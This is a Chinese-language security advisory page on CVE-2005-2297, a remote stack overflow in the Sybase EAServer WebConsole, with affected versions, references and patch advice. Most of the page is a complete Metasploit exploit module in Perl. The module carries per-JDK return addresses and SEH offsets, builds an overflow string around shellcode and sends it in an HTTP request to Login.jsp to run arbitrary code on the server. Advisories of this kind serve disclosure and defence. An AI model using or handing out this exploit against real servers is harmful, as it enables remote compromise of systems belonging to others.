安全研究
安全漏洞
Sybase EAServer WebConsol远程缓冲区溢出漏洞
发布日期:2005-07-18
更新日期:2006-05-04
受影响系统:
Sybase Enterprise Application Server 5.2描述:
Sybase Enterprise Application Server 5.1
Sybase Enterprise Application Server 5.0
Sybase Enterprise Application Server 4.2.5
Sybase Enterprise Application Server 4.2.2
Sybase Enterprise Application Server 4.2
BUGTRAQ ID: 14287
CVE(CAN) ID: CVE-2005-2297
Sybase EAServer是高性能、可伸缩、安全、开放的应用服务器,适用于适用多层架构的电子门户和互联商务解决方案。
Sybase EAServer的WebConsole中存在远程溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
成功的攻击可能导致覆盖明确大小的缓冲区溢出,这样就可以以jagsrv.exe进程的权限执行任意代码。请注意攻击者必须拥有有效的认证凭据才能发动攻击。
<*来源:spilabs (spilabs@spidynamics.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112146180532313&w=2
http://www.sybase.com/detail?id=1036742
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::sybase_easerver;
use strict;
use base "Msf::Exploit";
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Sybase EAServer 5.2 Remote Stack Overflow',
'Version' => '$Revision: 1.4 $',
'Authors' => [ 'anonymous' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ],
'Priv' => 1,
'AutoOpts' =>
{
'EXITFUNC' => 'thread'
},
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 8080 ],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'DIR' => [1, 'DATA', 'Directory of Login.jsp script', '/WebConsole/'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the Sybase EAServer Web
Console. The offset to the SEH frame appears to change depending
on what version of Java is in use by the remote server, making this
exploit somewhat unreliable.
}),
'Refs' =>
[
['BID', 14287],
],
'Targets' =>
[
# Technically we could combine these into a single multi-return string...
[ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', 0x6d4548ff, 3820],
[ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', 0x6d4548ff, 3841],
[ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', 0x08041b25, 3912],
[ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', 0x08041b25, 3925],
],
'Keys' => ['easerver'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $dir = $self->GetVar('DIR');
my $target = $self->Targets->[$target_idx];
$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'SSL' => $self->GetVar('SSL'),
);
if ( $s->IsError ) {
$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
return;
}
my $crash = Pex::Text::AlphaNumText(5000);
substr($crash, $target->[2] - 4, 2, "\xeb\x06");
substr($crash, $target->[2] , 4, pack("V", $target->[1]));
substr($crash, $target->[2] + 4, length($shellcode), $shellcode);
$dir = $dir . "Login.jsp?" . $crash;
my $request =
"GET $dir HTTP/1.1\r\n".
"Accept: */*\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
"Host: $target_host:$target_port\r\n".
"Connection: Close\r\n".
"\r\n";
$s->Send($request);
$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
select(undef, undef, undef, 4);
$self->Handler($s);
return;
}
1;
建议:
厂商补丁:
Sybase
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://downloads.sybase.com/
浏览次数:3810
严重程度:0(网友投票)
绿盟科技给您安全的保障